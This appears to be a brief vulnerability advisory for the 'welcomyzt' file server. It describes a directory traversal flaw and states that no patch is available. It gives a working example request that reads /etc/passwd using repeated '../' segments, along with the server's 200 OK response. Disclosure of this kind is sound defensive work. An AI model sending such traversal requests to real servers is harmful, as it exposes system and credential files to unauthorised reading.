Details

welcomyzt is a simple file server.

welcomyzt is vulnerable to a directory traversal issue, giving an attacker access to the filesystem by placing ../ in the url.

Example request:

GET /../../../../../../../../../../etc/passwd HTTP/1.1
host: localhost

and server Response:

HTTP/1.1 200 OK
Date: Thu, 04 May 2017 23:59:18 GMT
Connection: keep-alive
Transfer-Encoding: chunked

Recommendation

No patch is available for this vulnerability.
